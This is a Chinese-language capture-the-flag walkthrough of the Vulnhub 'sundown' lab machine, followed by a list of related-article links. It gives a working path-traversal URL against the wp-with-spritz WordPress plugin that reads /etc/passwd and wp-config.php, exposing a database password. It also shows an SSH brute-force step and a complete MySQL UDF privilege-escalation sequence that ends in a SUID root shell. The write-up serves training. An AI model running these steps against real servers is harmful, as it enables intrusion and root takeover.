kali:192.168.111.111

靶机:192.168.111.154

信息收集

端口扫描

访问web发现是wordpress

使用wpscan扫描,发现插件:wp-with-spritz

该插件存在存在文件包含漏洞

/usr/share/exploitdb/exploits/php/webapps/44544.php

漏洞利用

读取/etc/passwd文件

http://192.168.111.154/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

使用hydra爆破ssh

进入网站根目录发现只能以www-data读取里面的文件

文件包含wordpress配置文件获得mysql账号密码 root:VjFSQ2IyRnNUak5pZWpCTENnPT0K

http://192.168.111.154/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../var/www/html/wordpress/wp-config.php

提权

mysql udf提权

使用scp命令上传lib_mysqludf_sys_64.so到目标的/tmp目录

scp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so carlos@192.168.111.154:/tmp

登录MySQL数据库执行以下命令

#mysql必须要以root身份运行
ps -aux | grep mysql#当secure_file_priv的值没有具体值时,表示不对 mysqld 的导入|导出做限制
show global variables like '%secure%';#查看插件所在路径
show variables like '%plugin%';#创建数据表a
create table a(line blob);#往表a插入数据
insert into a values(load_file('/tmp/lib_mysqludf_sys_64.so'));#插入二进制数据, 然后利用dumpfile函数把文件导出
select * from a into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';#创建自定义函数sys_exec 类型是integer,别名 soname 文件名
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';#调用自定义函数执行命令
select sys_exec('cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash');#退出数据库执行命令
/tmp/bash -p

获得flag

vulnhub:sundown靶机相关推荐

  1. VulnHub - Pluck靶机

    VulnHub - Pluck靶机 arp-scan -l 探测靶机地址 nmap -sV -Pn -A x.x.x.230 dirb http://x.x.x.230 扫描目录 发现index.ph ...

  2. vulnhub——Earth靶机

    一.概要 攻击机:192.168.60.148 靶机:192.168.60.174 靶机下载地址:https://download.vulnhub.com/theplanets/Earth.ova.t ...

  3. vulnhub——ICA1靶机

    一.概要 靶机:192.168.1.103 攻击机:192.168.1.101 靶机下载地址:https://download.vulnhub.com/ica/ica1.zip 参考文章:https: ...

  4. VulnHub DC1靶机渗透测试

    1. 说明 虚拟机环境为VM VirtualBox2. 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 攻击机:kali 攻击目标:5个fl ...

  5. 【vulnhub】靶机- [DC系列]DC9(附靶机))

    主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.16 ...

  6. vulnhub:Typo靶机

    kali:192.168.111.111 靶机:192.168.111.163 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...

  7. vulnhub——oscp靶机

    一.概要 攻击机:192.168.60.148 靶机:192.168.60.172 二.主机发现 两种方法: 1.nmap扫描网段下主机 前提是知道靶机跟自己在同一C段,这里用的是虚拟机NAT模式,所 ...

  8. vulnhub:DC1靶机

    一.主机扫描 扫描ip 查看开放的端口 开启了22.80.111.53567端口.还有操作系统的信息 二.信息收集 先去看看80端口的情况 利用Firefox的Wappalyzer插件发现管理系统为D ...

  9. vulnhub Breakout靶机渗透

    环境安装好后主页面有ip ip:192.168.171.214 1.信息收集 1.1.1nmap扫描端口 nmap -sV -p- -A -sC 192.168.171.214 在80端口源代码中找到 ...

最新文章

  1. 警惕企业中的五种虚假执行力
  2. C#编码标准--编码习惯
  3. 职责链模式里面必须要知道的事情
  4. Markdwon中多张图片的并排显示(Mardown的灵动使用技巧)
  5. centos7安装redmine3.4
  6. 老平台已死,整理个文档留下做纪念
  7. spring boot整合mybatis步骤
  8. 干货:MySQL 索引原理及慢查询优化
  9. MYSQL--事务处理
  10. First C program
  11. [LeetCode] 143. Reorder List_Middle tag: Linked List
  12. python安装(不影响系统自带python)
  13. 计算机数据结构模拟试题,十套计算机数据结构试题及答案.doc
  14. 网络技术-Cisco路由器
  15. w10怎样关闭对计算机更改,W10电脑系统自动更新怎么关闭
  16. 计算机编码器的工作原理,优先级编码器74LS148的电路结构、工作原理及使用方法...
  17. 计算机技术与软件专业技术资格哪个好考,计算机技术与软件专业技术资格好考吗?考试时间?...
  18. ajax 发送 put 请求
  19. 怎样辨别光模块的真假?
  20. 计算机网路基础课后习题答案 主编刘建友

热门文章

  1. c语言error c4996,C++解决error C4996报错
  2. boost.compute使用gpu计算(c++)
  3. Chrome同时登录一个网站的多个账号
  4. hog 行人检测 matlab,hog+svm_行人检测matlab程序
  5. 陌陌联手JusTalk Cloud 对讲社交app新风尚
  6. 论文精读|大规模双样学习用于人证比对
  7. c++ thread 带参数编译错误:/usr/include/c++/4.8/functional:1697:61: error: no type named ‘type’ in ‘class st
  8. 【Wwise】Wwise嵌入Unity后打包出现没有声音问题
  9. 修改手机IP地址方法
  10. 吉时利Keithley静电计6517B|6514上位机控制软件NS-EM